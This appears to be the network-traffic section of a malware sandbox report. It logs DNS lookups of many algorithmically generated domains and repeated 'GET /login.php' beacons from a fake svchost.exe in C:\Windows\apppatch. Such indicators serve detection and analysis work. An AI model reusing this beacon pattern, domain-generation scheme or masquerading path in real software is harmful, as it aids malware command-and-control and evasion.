Nov 11, 2024 18:14:52.408780098 CET	1.1.1.1	192.168.2.6	0xecaa	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.408795118 CET	1.1.1.1	192.168.2.6	0xbcba	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.414619923 CET	1.1.1.1	192.168.2.6	0xa49c	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.419230938 CET	1.1.1.1	192.168.2.6	0x7d79	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.420999050 CET	1.1.1.1	192.168.2.6	0x92ce	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.421703100 CET	1.1.1.1	192.168.2.6	0x365c	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.421833038 CET	1.1.1.1	192.168.2.6	0xc0f2	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.421978951 CET	1.1.1.1	192.168.2.6	0x57d1	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.425667048 CET	1.1.1.1	192.168.2.6	0xb237	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.435834885 CET	1.1.1.1	192.168.2.6	0xb8cf	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.505532026 CET	1.1.1.1	192.168.2.6	0x6835	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.511306047 CET	1.1.1.1	192.168.2.6	0x5fb0	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.525607109 CET	1.1.1.1	192.168.2.6	0xaa0a	No error (0)	puzylyp.com		75.2.71.199	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.525607109 CET	1.1.1.1	192.168.2.6	0xaa0a	No error (0)	puzylyp.com		99.83.170.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.527156115 CET	1.1.1.1	192.168.2.6	0x2e10	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.558777094 CET	1.1.1.1	192.168.2.6	0xec37	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.572365999 CET	1.1.1.1	192.168.2.6	0x77f0	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.572623014 CET	1.1.1.1	192.168.2.6	0xd86	No error (0)	vojyqem.com	77980.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:14:52.572623014 CET	1.1.1.1	192.168.2.6	0xd86	No error (0)	77980.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.581875086 CET	1.1.1.1	192.168.2.6	0xffd	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.595557928 CET	1.1.1.1	192.168.2.6	0xa33	Server failure (2)	lysyfyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.625622034 CET	1.1.1.1	192.168.2.6	0x26ff	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.887693882 CET	1.1.1.1	192.168.2.6	0x29a9	No error (0)	www.gahyqah.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:14:52.887693882 CET	1.1.1.1	192.168.2.6	0x29a9	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.806469917 CET	1.1.1.1	192.168.2.6	0x82dc	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.806592941 CET	1.1.1.1	192.168.2.6	0x85c4	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.806806087 CET	1.1.1.1	192.168.2.6	0xe8b6	Name error (3)	vojymic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.806890965 CET	1.1.1.1	192.168.2.6	0x9829	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807117939 CET	1.1.1.1	192.168.2.6	0xb15e	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807141066 CET	1.1.1.1	192.168.2.6	0x9e4c	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807177067 CET	1.1.1.1	192.168.2.6	0xfd49	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807362080 CET	1.1.1.1	192.168.2.6	0x85ef	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807384968 CET	1.1.1.1	192.168.2.6	0x7fa	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807432890 CET	1.1.1.1	192.168.2.6	0x36cf	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807442904 CET	1.1.1.1	192.168.2.6	0xda30	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807616949 CET	1.1.1.1	192.168.2.6	0x9846	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807627916 CET	1.1.1.1	192.168.2.6	0xacf0	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807637930 CET	1.1.1.1	192.168.2.6	0xd849	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807748079 CET	1.1.1.1	192.168.2.6	0x3185	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807758093 CET	1.1.1.1	192.168.2.6	0xd47e	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807786942 CET	1.1.1.1	192.168.2.6	0x4bb6	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.807900906 CET	1.1.1.1	192.168.2.6	0xd0cc	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808085918 CET	1.1.1.1	192.168.2.6	0x858e	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808137894 CET	1.1.1.1	192.168.2.6	0x60c	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808146954 CET	1.1.1.1	192.168.2.6	0x7ace	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808161974 CET	1.1.1.1	192.168.2.6	0x47ab	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808198929 CET	1.1.1.1	192.168.2.6	0x2fde	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808321953 CET	1.1.1.1	192.168.2.6	0xb24a	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808532000 CET	1.1.1.1	192.168.2.6	0xef53	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808554888 CET	1.1.1.1	192.168.2.6	0xebe1	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808638096 CET	1.1.1.1	192.168.2.6	0x6244	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808648109 CET	1.1.1.1	192.168.2.6	0xcf6a	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808656931 CET	1.1.1.1	192.168.2.6	0xb9a4	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808685064 CET	1.1.1.1	192.168.2.6	0x4ab2	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808734894 CET	1.1.1.1	192.168.2.6	0x64ef	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808782101 CET	1.1.1.1	192.168.2.6	0x7a50	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.808814049 CET	1.1.1.1	192.168.2.6	0x3ff4	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.809271097 CET	1.1.1.1	192.168.2.6	0x595b	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.809505939 CET	1.1.1.1	192.168.2.6	0xf82b	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.809515953 CET	1.1.1.1	192.168.2.6	0x858	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.809524059 CET	1.1.1.1	192.168.2.6	0x47a4	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.810081005 CET	1.1.1.1	192.168.2.6	0x4be1	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.810411930 CET	1.1.1.1	192.168.2.6	0xa0b0	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.810648918 CET	1.1.1.1	192.168.2.6	0x706e	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.812470913 CET	1.1.1.1	192.168.2.6	0xed9f	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.818805933 CET	1.1.1.1	192.168.2.6	0xc990	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.818805933 CET	1.1.1.1	192.168.2.6	0xc990	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.826658010 CET	1.1.1.1	192.168.2.6	0x6c71	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.827747107 CET	1.1.1.1	192.168.2.6	0xf846	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.827841997 CET	1.1.1.1	192.168.2.6	0xc3d6	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.827964067 CET	1.1.1.1	192.168.2.6	0x6cce	Name error (3)	qegyfyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.828227997 CET	1.1.1.1	192.168.2.6	0x19d3	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.828272104 CET	1.1.1.1	192.168.2.6	0x8acd	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.828310966 CET	1.1.1.1	192.168.2.6	0x3ce5	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.828344107 CET	1.1.1.1	192.168.2.6	0xdc10	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.828890085 CET	1.1.1.1	192.168.2.6	0xa980	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.829096079 CET	1.1.1.1	192.168.2.6	0x5b41	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.829107046 CET	1.1.1.1	192.168.2.6	0x5694	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.829121113 CET	1.1.1.1	192.168.2.6	0x4d59	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.829132080 CET	1.1.1.1	192.168.2.6	0x4a5a	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.829169989 CET	1.1.1.1	192.168.2.6	0x4088	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.829488039 CET	1.1.1.1	192.168.2.6	0x5730	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.829591990 CET	1.1.1.1	192.168.2.6	0x32d4	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.830410004 CET	1.1.1.1	192.168.2.6	0xa113	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.831507921 CET	1.1.1.1	192.168.2.6	0xb6bd	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.836481094 CET	1.1.1.1	192.168.2.6	0xab17	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.836481094 CET	1.1.1.1	192.168.2.6	0xab17	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:15:00.000912905 CET	1.1.1.1	192.168.2.6	0x439f	No error (0)	lygynud.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:15:00.009227991 CET	1.1.1.1	192.168.2.6	0xb694	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:15:00.376717091 CET	1.1.1.1	192.168.2.6	0x6c4	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:15:00.376717091 CET	1.1.1.1	192.168.2.6	0x6c4	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:15:00.376717091 CET	1.1.1.1	192.168.2.6	0x6c4	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.10.48	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.comuser-agent:

qegyhig.com

puzylyp.com

lysyvan.com

gahyqah.com

vocyzit.com

lyvyxor.com

gatyfus.com

vonypom.com

gadyniw.com

qetyfuv.com

vojyqem.com

lymyxid.com

galyqaz.com

pupydeq.com

lygynud.com

pupycag.com

lyrysor.com

106.15.232.163:8000

galynuh.com

qexyhuv.com

lyxynyx.com

gadyciz.com

qegyval.com

vofycot.com

ww25.lyxynyx.com

ww16.vofycot.com

qetyhyg.com

gatyhub.com

lygyvuj.com

gahyhiz.com

www.gahyqah.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	23.253.46.64	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.891082048 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Nov 11, 2024 18:13:01.347887039 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:12:56 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:13:01.347927094 CET	169	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49708	44.221.84.105	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.893512964 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Nov 11, 2024 18:13:01.323270082 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49709	208.100.26.245	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.893631935 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:13:01.341805935 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:01.346458912 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:13:01.448962927 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:25.085112095 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:13:25.189330101 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:13:25 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:25.396053076 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
